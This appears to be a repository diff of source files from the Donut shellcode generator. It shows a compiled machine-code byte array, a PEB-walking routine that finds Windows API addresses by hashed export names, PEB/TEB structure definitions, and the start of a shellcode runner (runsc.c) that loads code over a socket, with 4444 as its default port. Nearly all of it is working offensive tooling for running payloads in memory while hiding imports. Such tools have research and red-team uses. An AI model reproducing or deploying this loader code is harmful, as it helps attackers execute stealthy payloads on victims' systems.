575 0x24, 0x04, 0x99, 0xf7, 0x7c, 0x24, 0x08, 0xc3, 0xe8, 0x00, 0x00, 0x00,
576 0x00, 0x58, 0x83, 0xe8, 0x05, 0xc3, 0x55, 0x8b, 0xec, 0x64, 0xa1, 0x30,
577 0x00, 0x00, 0x00, 0x33, 0xc9, 0x56, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x0c,
578 0xeb, 0x20, 0x85, 0xc9, 0x75, 0x23, 0xff, 0x75, 0x18, 0xff, 0x75, 0x14,
579 0xff, 0x75, 0x10, 0xff, 0x75, 0x0c, 0x50, 0xff, 0x75, 0x08, 0xe8, 0x8c,
580 0xed, 0xff, 0xff, 0x8b, 0x36, 0x83, 0xc4, 0x18, 0x8b, 0xc8, 0x8b, 0x46,
581 0x18, 0x85, 0xc0, 0x75, 0xd9, 0x8b, 0xc1, 0x5e, 0x5d, 0xc3, 0x8b, 0x44,
582 0x24, 0x08, 0x56, 0x8b, 0x74, 0x24, 0x08, 0x8a, 0x16, 0x84, 0xd2, 0x74,
583 0x14, 0x8a, 0xca, 0x2b, 0xf0, 0x8a, 0xd1, 0x3a, 0x08, 0x75, 0x0a, 0x40,
584 0x8a, 0x0c, 0x06, 0x8a, 0xd1, 0x84, 0xc9, 0x75, 0xf0, 0x0f, 0xb6, 0x08,
585 0x0f, 0xb6, 0xc2, 0x2b, 0xc1, 0x5e, 0xc3, 0x83, 0xec, 0x14, 0x53, 0x8b,
586 0x5c, 0x24, 0x20, 0x33, 0xc0, 0x55, 0x8b, 0x6c, 0x24, 0x28, 0x56, 0x57,
587 0x33, 0xff, 0x89, 0x44, 0x24, 0x2c, 0x33, 0xf6, 0x89, 0x74, 0x24, 0x10,
588 0x8b, 0x4c, 0x24, 0x28, 0x8a, 0x0c, 0x08, 0x84, 0xc9, 0x74, 0x11, 0x83,
589 0xf8, 0x40, 0x74, 0x0c, 0x88, 0x4c, 0x3c, 0x14, 0x47, 0x40, 0x89, 0x44,
590 0x24, 0x2c, 0xeb, 0x57, 0x6a, 0x10, 0x58, 0x2b, 0xc7, 0x8d, 0x74, 0x24,
591 0x14, 0x50, 0x03, 0xf7, 0x6a, 0x00, 0x56, 0xe8, 0xfd, 0x01, 0x00, 0x00,
592 0x83, 0xc4, 0x0c, 0xc6, 0x06, 0x80, 0x83, 0xff, 0x0c, 0x72, 0x21, 0x55,
593 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x5e, 0x00, 0x00, 0x00, 0x6a,
594 0x10, 0x33, 0xd8, 0x33, 0xea, 0x8d, 0x44, 0x24, 0x24, 0x6a, 0x00, 0x50,
595 0xe8, 0xd4, 0x01, 0x00, 0x00, 0x83, 0xc4, 0x18, 0x8b, 0x44, 0x24, 0x2c,
596 0x8b, 0x74, 0x24, 0x10, 0xc1, 0xe0, 0x03, 0x46, 0x6a, 0x10, 0x89, 0x44,
597 0x24, 0x24, 0x5f, 0x89, 0x74, 0x24, 0x10, 0x83, 0xff, 0x10, 0x75, 0x15,
598 0x55, 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x21, 0x00, 0x00, 0x00,
599 0x83, 0xc4, 0x0c, 0x33, 0xd8, 0x33, 0xea, 0x33, 0xff, 0x8b, 0x44, 0x24,
600 0x2c, 0x85, 0xf6, 0x0f, 0x84, 0x67, 0xff, 0xff, 0xff, 0x5f, 0x5e, 0x8b,
601 0xd5, 0x8b, 0xc3, 0x5d, 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x83, 0xec, 0x10,
602 0x8b, 0x44, 0x24, 0x18, 0x8b, 0x54, 0x24, 0x1c, 0x53, 0x55, 0x56, 0x8b,
603 0x74, 0x24, 0x20, 0x33, 0xdb, 0x57, 0x8d, 0x7c, 0x24, 0x10, 0xa5, 0xa5,
604 0xa5, 0xa5, 0x8b, 0x4c, 0x24, 0x14, 0x8b, 0x74, 0x24, 0x1c, 0x8b, 0x6c,
605 0x24, 0x18, 0x8b, 0x7c, 0x24, 0x10, 0x89, 0x4c, 0x24, 0x28, 0x8b, 0xce,
606 0xc1, 0xc8, 0x08, 0x8b, 0x74, 0x24, 0x28, 0x03, 0xc2, 0xc1, 0xce, 0x08,
607 0x33, 0xc7, 0x03, 0xf7, 0xc1, 0xc2, 0x03, 0x33, 0xf3, 0xc1, 0xc7, 0x03,
608 0x33, 0xd0, 0x89, 0x6c, 0x24, 0x28, 0x33, 0xfe, 0x8b, 0xe9, 0x43, 0x83,
609 0xfb, 0x1b, 0x72, 0xd6, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x10, 0xc3,
610 0x8b, 0x54, 0x24, 0x10, 0x83, 0xec, 0x14, 0x53, 0x8b, 0x5c, 0x24, 0x24,
611 0x85, 0xd2, 0x0f, 0x84, 0xe8, 0x00, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x20,
612 0x55, 0x33, 0xed, 0x45, 0x56, 0x8d, 0x48, 0x0f, 0x2b, 0xe8, 0x57, 0x89,
613 0x4c, 0x24, 0x10, 0x89, 0x6c, 0x24, 0x34, 0x8b, 0xf0, 0x8d, 0x7c, 0x24,
614 0x14, 0x33, 0xc9, 0xa5, 0xa5, 0xa5, 0xa5, 0x8b, 0x74, 0x24, 0x28, 0x8b,
615 0x04, 0x8e, 0x31, 0x44, 0x8c, 0x14, 0x41, 0x83, 0xf9, 0x04, 0x72, 0xf3,
616 0x8b, 0x74, 0x24, 0x20, 0x8b, 0x44, 0x24, 0x1c, 0x8b, 0x7c, 0x24, 0x18,
617 0x8b, 0x4c, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x30, 0x10, 0x00, 0x00, 0x00,
618 0x03, 0xcf, 0x03, 0xc6, 0xc1, 0xc7, 0x05, 0x33, 0xf9, 0xc1, 0xc6, 0x08,
619 0x33, 0xf0, 0xc1, 0xc1, 0x10, 0x03, 0xc7, 0x03, 0xce, 0xc1, 0xc7, 0x07,
620 0xc1, 0xc6, 0x0d, 0x33, 0xf8, 0x33, 0xf1, 0xc1, 0xc0, 0x10, 0x83, 0x6c,
621 0x24, 0x30, 0x01, 0x75, 0xd7, 0x8b, 0x6c, 0x24, 0x28, 0x89, 0x4c, 0x24,
622 0x14, 0x33, 0xc9, 0x89, 0x74, 0x24, 0x20, 0x89, 0x7c, 0x24, 0x18, 0x89,
623 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x8d, 0x00, 0x31, 0x44, 0x8c, 0x14, 0x41,
624 0x83, 0xf9, 0x04, 0x72, 0xf2, 0x8b, 0x6c, 0x24, 0x34, 0x8b, 0xca, 0x6a,
625 0x10, 0x58, 0x3b, 0xd0, 0x0f, 0x47, 0xc8, 0x85, 0xc9, 0x7e, 0x19, 0x8d,
626 0x7c, 0x24, 0x14, 0x8b, 0xf3, 0x2b, 0xfb, 0x8b, 0xe9, 0x8a, 0x04, 0x37,
627 0x30, 0x06, 0x46, 0x83, 0xed, 0x01, 0x75, 0xf5, 0x8b, 0x6c, 0x24, 0x34,
628 0x2b, 0xd1, 0x03, 0xd9, 0x8b, 0x4c, 0x24, 0x10, 0x80, 0x01, 0x01, 0x75,
629 0x08, 0x49, 0x8d, 0x04, 0x29, 0x85, 0xc0, 0x7f, 0xf3, 0x8b, 0x44, 0x24,
630 0x2c, 0x85, 0xd2, 0x0f, 0x85, 0x32, 0xff, 0xff, 0xff, 0x5f, 0x5e, 0x5d,
631 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x8b, 0x54, 0x24, 0x0c, 0x8b, 0x44, 0x24,
632 0x04, 0x56, 0x8b, 0xf0, 0x85, 0xd2, 0x74, 0x13, 0x57, 0x8b, 0x7c, 0x24,
633 0x10, 0x2b, 0xf8, 0x8a, 0x0c, 0x37, 0x88, 0x0e, 0x46, 0x83, 0xea, 0x01,
634 0x75, 0xf5, 0x5f, 0x5e, 0xc3, 0x8a, 0x44, 0x24, 0x08, 0x8b, 0x4c, 0x24,
635 0x0c, 0x57, 0x8b, 0x7c, 0x24, 0x08, 0xf3, 0xaa, 0x8b, 0x44, 0x24, 0x08,
636 0x5f, 0xc3};
637
+0
-149
payload/peb.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // locate address of API in export table using Maru hash function
32 LPVOID FindExport(PDONUT_INSTANCE inst, LPVOID base, ULONG64 api_hash, ULONG64 iv){
33 PIMAGE_DOS_HEADER dos;
34 PIMAGE_NT_HEADERS nt;
35 DWORD i, j, cnt, rva;
36 PIMAGE_DATA_DIRECTORY dir;
37 PIMAGE_EXPORT_DIRECTORY exp;
38 PDWORD adr;
39 PDWORD sym;
40 PWORD ord;
41 PCHAR api, dll, p;
42 LPVOID addr=NULL;
43 ULONG64 dll_hash;
44 CHAR buf[MAX_PATH], dll_name[64], api_name[128];
45
46 dos = (PIMAGE_DOS_HEADER)base;
47 nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
48 dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
49 rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
50
51 // if no export table, return NULL
52 if (rva==0) return NULL;
53
54 exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, base, rva);
55 cnt = exp->NumberOfNames;
56
57 // if no api names, return NULL
58 if (cnt==0) return NULL;
59
60 adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions);
61 sym = RVA2VA(PDWORD,base, exp->AddressOfNames);
62 ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals);
63 dll = RVA2VA(PCHAR, base, exp->Name);
64
65 // get hash of DLL string converted to lowercase
66 for(i=0;dll[i]!=0;i++) {
67 buf[i] = dll[i] | 0x20;
68 }
69 buf[i] = 0;
70 dll_hash = maru(buf, iv);
71
72 do {
73 // calculate hash of api string
74 api = RVA2VA(PCHAR, base, sym[cnt-1]);
75 // xor with DLL hash and compare with hash to find
76 if ((maru(api, iv) ^ dll_hash) == api_hash) {
77 // return address of function
78 addr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]);
79
80 // is this a forward reference?
81 if ((PBYTE)addr >= (PBYTE)exp &&
82 (PBYTE)addr < (PBYTE)exp +
83 dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
84 {
85 DPRINT("%016llx is forwarded to %s",
86 api_hash, (char*)addr);
87
88 // copy DLL name to buffer
89 p=(char*)addr;
90
91 for(i=0; p[i] != 0 && i < sizeof(dll_name)-4; i++) {
92 dll_name[i] = p[i];
93 if(p[i] == '.') break;
94 }
95
96 dll_name[i+1] = 'd';
97 dll_name[i+2] = 'l';
98 dll_name[i+3] = 'l';
99 dll_name[i+4] = 0;
100
101 p += i + 1;
102
103 // copy API name to buffer
104 for(i=0; p[i] != 0 && i < sizeof(api_name)-1;i++) {
105 api_name[i] = p[i];
106 }
107 api_name[i] = 0;
108
109 DPRINT("Trying to load %s", dll_name);
110 HMODULE hModule = inst->api.LoadLibrary(dll_name);
111
112 if(hModule != NULL) {
113 DPRINT("Calling GetProcAddress(%s)", api_name);
114 addr = inst->api.GetProcAddress(hModule, api_name);
115 } else addr = NULL;
116 }
117 return addr;
118 }
119 } while (--cnt && addr == NULL);
120
121 return addr;
122 }
123
124 // search all modules in the PEB for API
125 LPVOID xGetProcAddress(PDONUT_INSTANCE inst, ULONG64 ulHash, ULONG64 ulIV) {
126 PPEB peb;
127 PPEB_LDR_DATA ldr;
128 PLDR_DATA_TABLE_ENTRY dte;
129 LPVOID addr = NULL;
130
131 #if defined(_WIN64)
132 peb = (PPEB) __readgsqword(0x60);
133 #else
134 peb = (PPEB) __readfsdword(0x30);
135 #endif
136
137 ldr = (PPEB_LDR_DATA)peb->Ldr;
138
139 // for each DLL loaded
140 for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
141 dte->DllBase != NULL && addr == NULL;
142 dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
143 {
144 // search the export table for api
145 addr = FindExport(inst, dte->DllBase, ulHash, ulIV);
146 }
147 return addr;
148 }
+0
-360
payload/peb.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef PEB_H
32 #define PEB_H
33
34 #include <windows.h>
35
36 typedef void *PPS_POST_PROCESS_INIT_ROUTINE;
37
38 typedef struct _LSA_UNICODE_STRING {
39 USHORT Length;
40 USHORT MaximumLength;
41 PWSTR Buffer;
42 } LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;
43
44 typedef struct _RTL_USER_PROCESS_PARAMETERS {
45 BYTE Reserved1[16];
46 PVOID Reserved2[10];
47 UNICODE_STRING ImagePathName;
48 UNICODE_STRING CommandLine;
49 } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
50
51 // PEB defined by rewolf
52 // http://blog.rewolf.pl/blog/?p=573
53 typedef struct _PEB_LDR_DATA {
54 ULONG Length;
55 BOOL Initialized;
56 LPVOID SsHandle;
57 LIST_ENTRY InLoadOrderModuleList;
58 LIST_ENTRY InMemoryOrderModuleList;
59 LIST_ENTRY InInitializationOrderModuleList;
60 } PEB_LDR_DATA, *PPEB_LDR_DATA;
61
62 typedef struct _LDR_DATA_TABLE_ENTRY
63 {
64 LIST_ENTRY InLoadOrderLinks;
65 LIST_ENTRY InMemoryOrderLinks;
66 LIST_ENTRY InInitializationOrderLinks;
67 LPVOID DllBase;
68 LPVOID EntryPoint;
69 ULONG SizeOfImage;
70 UNICODE_STRING FullDllName;
71 UNICODE_STRING BaseDllName;
72 } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
73
74 typedef struct _PEB {
75 BYTE InheritedAddressSpace;
76 BYTE ReadImageFileExecOptions;
77 BYTE BeingDebugged;
78 BYTE _SYSTEM_DEPENDENT_01;
79
80 LPVOID Mutant;
81 LPVOID ImageBaseAddress;
82
83 PPEB_LDR_DATA Ldr;
84 PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
85 LPVOID SubSystemData;
86 LPVOID ProcessHeap;
87 LPVOID FastPebLock;
88 LPVOID _SYSTEM_DEPENDENT_02;
89 LPVOID _SYSTEM_DEPENDENT_03;
90 LPVOID _SYSTEM_DEPENDENT_04;
91 union {
92 LPVOID KernelCallbackTable;
93 LPVOID UserSharedInfoPtr;
94 };
95 DWORD SystemReserved;
96 DWORD _SYSTEM_DEPENDENT_05;
97 LPVOID _SYSTEM_DEPENDENT_06;
98 LPVOID TlsExpansionCounter;
99 LPVOID TlsBitmap;
100 DWORD TlsBitmapBits[2];
101 LPVOID ReadOnlySharedMemoryBase;
102 LPVOID _SYSTEM_DEPENDENT_07;
103 LPVOID ReadOnlyStaticServerData;
104 LPVOID AnsiCodePageData;
105 LPVOID OemCodePageData;
106 LPVOID UnicodeCaseTableData;
107 DWORD NumberOfProcessors;
108 union
109 {
110 DWORD NtGlobalFlag;
111 LPVOID dummy02;
112 };
113 LARGE_INTEGER CriticalSectionTimeout;
114 LPVOID HeapSegmentReserve;
115 LPVOID HeapSegmentCommit;
116 LPVOID HeapDeCommitTotalFreeThreshold;
117 LPVOID HeapDeCommitFreeBlockThreshold;
118 DWORD NumberOfHeaps;
119 DWORD MaximumNumberOfHeaps;
120 LPVOID ProcessHeaps;
121 LPVOID GdiSharedHandleTable;
122 LPVOID ProcessStarterHelper;
123 LPVOID GdiDCAttributeList;
124 LPVOID LoaderLock;
125 DWORD OSMajorVersion;
126 DWORD OSMinorVersion;
127 WORD OSBuildNumber;
128 WORD OSCSDVersion;
129 DWORD OSPlatformId;
130 DWORD ImageSubsystem;
131 DWORD ImageSubsystemMajorVersion;
132 LPVOID ImageSubsystemMinorVersion;
133 union
134 {
135 LPVOID ImageProcessAffinityMask;
136 LPVOID ActiveProcessAffinityMask;
137 };
138 #ifdef _WIN64
139 LPVOID GdiHandleBuffer[64];
140 #else
141 LPVOID GdiHandleBuffer[32];
142 #endif
143 LPVOID PostProcessInitRoutine;
144 LPVOID TlsExpansionBitmap;
145 DWORD TlsExpansionBitmapBits[32];
146 LPVOID SessionId;
147 ULARGE_INTEGER AppCompatFlags;
148 ULARGE_INTEGER AppCompatFlagsUser;
149 LPVOID pShimData;
150 LPVOID AppCompatInfo;
151 PUNICODE_STRING CSDVersion;
152 LPVOID ActivationContextData;
153 LPVOID ProcessAssemblyStorageMap;
154 LPVOID SystemDefaultActivationContextData;
155 LPVOID SystemAssemblyStorageMap;
156 LPVOID MinimumStackCommit;
157 } PEB, *PPEB;
158
159
160 typedef struct _CLIENT_ID {
161 HANDLE UniqueProcess;
162 HANDLE UniqueThread;
163 } CLIENT_ID, *PCLIENT_ID;
164
165 typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
166 typedef struct _ACTIVATION_CONTEXT *PACTIVATION_CONTEXT;
167 typedef struct _TEB_ACTIVE_FRAME *PTEB_ACTIVE_FRAME;
168 typedef struct _TEB_ACTIVE_FRAME_CONTEXT *PTEB_ACTIVE_FRAME_CONTEXT;
169
170 typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
171 PRTL_ACTIVATION_CONTEXT_STACK_FRAME Previous;
172 PACTIVATION_CONTEXT *ActivationContext;
173 ULONG Flags;
174 } RTL_ACTIVATION_CONTEXT_STACK_FRAME, *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
175
176 typedef struct _ACTIVATION_CONTEXT_STACK
177 {
178 PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
179 LIST_ENTRY FrameListCache;
180 ULONG Flags;
181 ULONG NextCookieSequenceNumber;
182 ULONG StackId;
183 } ACTIVATION_CONTEXT_STACK, *PACTIVATION_CONTEXT_STACK;
184 #define GDI_BATCH_BUFFER_SIZE 310
185
186 typedef struct _GDI_TEB_BATCH
187 {
188 ULONG Offset;
189 ULONG_PTR HDC;
190 ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
191 } GDI_TEB_BATCH, *PGDI_TEB_BATCH;
192
193 typedef struct _TEB_ACTIVE_FRAME_CONTEXT
194 {
195 ULONG Flags;
196 PSTR FrameName;
197 } TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT;
198
199 typedef struct _TEB_ACTIVE_FRAME
200 {
201 ULONG Flags;
202 struct _TEB_ACTIVE_FRAME *Previous;
203 PTEB_ACTIVE_FRAME_CONTEXT Context;
204 } TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME;
205
206 #if !defined(_MSC_VER)
207 typedef struct _PROCESSOR_NUMBER {
208 USHORT Group;
209 UCHAR Number;
210 UCHAR Reserved;
211 } PROCESSOR_NUMBER, *PPROCESSOR_NUMBER;
212 #endif
213
214 typedef struct _TEB
215 {
216 NT_TIB NtTib;
217
218 PVOID EnvironmentPointer;
219 CLIENT_ID ClientId;
220 PVOID ActiveRpcHandle;
221 PVOID ThreadLocalStoragePointer;
222 PPEB ProcessEnvironmentBlock;
223
224 ULONG LastErrorValue;
225 ULONG CountOfOwnedCriticalSections;
226 PVOID CsrClientThread;
227 PVOID Win32ThreadInfo;
228 ULONG User32Reserved[26];
229 ULONG UserReserved[5];
230 PVOID WOW32Reserved;
231 LCID CurrentLocale;
232 ULONG FpSoftwareStatusRegister;
233 PVOID SystemReserved1[54];
234 NTSTATUS ExceptionCode;
235 PVOID ActivationContextStackPointer;
236 #ifdef _M_X64
237 UCHAR SpareBytes[24];
238 #else
239 UCHAR SpareBytes[36];
240 #endif
241 ULONG TxFsContext;
242
243 GDI_TEB_BATCH GdiTebBatch;
244 CLIENT_ID RealClientId;
245 HANDLE GdiCachedProcessHandle;
246 ULONG GdiClientPID;
247 ULONG GdiClientTID;
248 PVOID GdiThreadLocalInfo;
249 ULONG_PTR Win32ClientInfo[62];
250 PVOID glDispatchTable[233];
251 ULONG_PTR glReserved1[29];
252 PVOID glReserved2;
253 PVOID glSectionInfo;
254 PVOID glSection;
255 PVOID glTable;
256 PVOID glCurrentRC;
257 PVOID glContext;
258
259 NTSTATUS LastStatusValue;
260 UNICODE_STRING StaticUnicodeString;
261 WCHAR StaticUnicodeBuffer[261];
262
263 PVOID DeallocationStack;
264 PVOID TlsSlots[64];
265 LIST_ENTRY TlsLinks;
266
267 PVOID Vdm;
268 PVOID ReservedForNtRpc;
269 PVOID DbgSsReserved[2];
270
271 ULONG HardErrorMode;
272 #ifdef _M_X64
273 PVOID Instrumentation[11];
274 #else
275 PVOID Instrumentation[9];
276 #endif
277 GUID ActivityId;
278
279 PVOID SubProcessTag;
280 PVOID EtwLocalData;
281 PVOID EtwTraceData;
282 PVOID WinSockData;
283 ULONG GdiBatchCount;
284
285 union
286 {
287 PROCESSOR_NUMBER CurrentIdealProcessor;
288 ULONG IdealProcessorValue;
289 struct
290 {
291 UCHAR ReservedPad0;
292 UCHAR ReservedPad1;
293 UCHAR ReservedPad2;
294 UCHAR IdealProcessor;
295 };
296 };
297
298 ULONG GuaranteedStackBytes;
299 PVOID ReservedForPerf;
300 PVOID ReservedForOle;
301 ULONG WaitingOnLoaderLock;
302 PVOID SavedPriorityState;
303 ULONG_PTR SoftPatchPtr1;
304 PVOID ThreadPoolData;
305 PVOID *TlsExpansionSlots;
306 #ifdef _M_X64
307 PVOID DeallocationBStore;
308 PVOID BStoreLimit;
309 #endif
310 ULONG MuiGeneration;
311 ULONG IsImpersonating;
312 PVOID NlsCache;
313 PVOID pShimData;
314 ULONG HeapVirtualAffinity;
315 HANDLE CurrentTransactionHandle;
316 PTEB_ACTIVE_FRAME ActiveFrame;
317 PVOID FlsData;
318
319 PVOID PreferredLanguages;
320 PVOID UserPrefLanguages;
321 PVOID MergedPrefLanguages;
322 ULONG MuiImpersonation;
323
324 union
325 {
326 USHORT CrossTebFlags;
327 USHORT SpareCrossTebBits : 16;
328 };
329 union
330 {
331 USHORT SameTebFlags;
332 struct
333 {
334 USHORT SafeThunkCall : 1;
335 USHORT InDebugPrint : 1;
336 USHORT HasFiberData : 1;
337 USHORT SkipThreadAttach : 1;
338 USHORT WerInShipAssertCode : 1;
339 USHORT RanProcessInit : 1;
340 USHORT ClonedThread : 1;
341 USHORT SuppressDebugMsg : 1;
342 USHORT DisableUserStackWalk : 1;
343 USHORT RtlExceptionAttached : 1;
344 USHORT InitialThread : 1;
345 USHORT SessionAware : 1;
346 USHORT SpareSameTebBits : 4;
347 };
348 };
349
350 PVOID TxnScopeEnterCallback;
351 PVOID TxnScopeExitCallback;
352 PVOID TxnScopeContext;
353 ULONG LockCount;
354 ULONG SpareUlong0;
355 PVOID ResourceRetValue;
356 PVOID ReservedForWdf;
357 } TEB, *PTEB;
358
359 #endif
+0
-734
payload/runsc.c less more
0
1 /**
2 Copyright © 2016-2019 Odzhan. All Rights Reserved.
3
4 Redistribution and use in source and binary forms, with or without
5 modification, are permitted provided that the following conditions are
6 met:
7
8 1. Redistributions of source code must retain the above copyright
9 notice, this list of conditions and the following disclaimer.
10
11 2. Redistributions in binary form must reproduce the above copyright
12 notice, this list of conditions and the following disclaimer in the
13 documentation and/or other materials provided with the distribution.
14
15 3. The name of the author may not be used to endorse or promote products
16 derived from this software without specific prior written permission.
17
18 THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
19 IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
20 WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
21 DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
22 INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
23 (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
24 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
25 HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
26 STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
27 ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
28 POSSIBILITY OF SUCH DAMAGE. */
29
30 #if defined(_WIN32) || defined(_WIN64)
31 #ifndef _WIN32_WINNT
32 #define _WIN32_WINNT 0x0502
33 #endif
34 #define WIN
35 #ifndef _WINSOCKAPI_
36 #define _WINSOCKAPI_
37 #endif
38 #include <windows.h>
39 #include <shlwapi.h>
40 #include <winsock2.h>
41 #include <ws2tcpip.h>
42 #define close closesocket
43 #define SHUT_RDWR SD_BOTH
44 #pragma comment(lib, "ws2_32.lib")
45 #pragma comment(lib, "shlwapi.lib")
46 #else
47 #include <unistd.h>
48 #include <sys/socket.h>
49 #include <sys/types.h>
50 #include <sys/mman.h>
51 #include <arpa/inet.h>
52 #include <netdb.h>
53 #include <netinet/in.h>
54 #include <sys/ioctl.h>
55 #include <net/if.h>
56 #include <signal.h>
57 #include <fcntl.h>
58 #endif
59
60 #include <stdio.h>
61 #include <stdint.h>
62 #include <string.h>
63 #include <stdlib.h>
64 #include <time.h>
65 #include <sys/stat.h>
66
67 #define RSC_CLIENT 0
68 #define RSC_SERVER 1
69 #define RSC_EXEC 2
70
71 #define RSC_SEND 0
72 #define RSC_RECV 1
73
74 #define DEFAULT_PORT "4444"
75
76 // structure for parameters
77 typedef struct _args_t {
78 int s, r;
79 char *port, *address, *file;
80 #ifdef WIN
81 char *modules;
82 #endif
83 int port_nbr, ai_family, mode, sim, tx_mode, ai_addrlen, dbg;
84 struct sockaddr *ai_addr;
85 struct sockaddr_in v4;
86 struct sockaddr_in6 v6;
87 char ip[INET6_ADDRSTRLEN];
88 uint32_t code_len;
89 void *code;
90 } args_t;
91
92 #ifdef WIN
93 /**F*****************************************************************/
94 void xstrerror (char *fmt, ...)
95 /**
96 * PURPOSE : Display windows error
97 *
98 * RETURN : Nothing
99 *
100 * NOTES : None
101 *
102 *F*/
103 {
104 char *error=NULL;
105 va_list arglist;
106 char buffer[2048];
107 DWORD dwError=GetLastError();
108
109 va_start (arglist, fmt);
110 wvnsprintf (buffer, sizeof(buffer) - 1, fmt, arglist);
111 va_end (arglist);
112
113 if (FormatMessage (
114 FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
115 NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
116 (LPSTR)&error, 0, NULL))
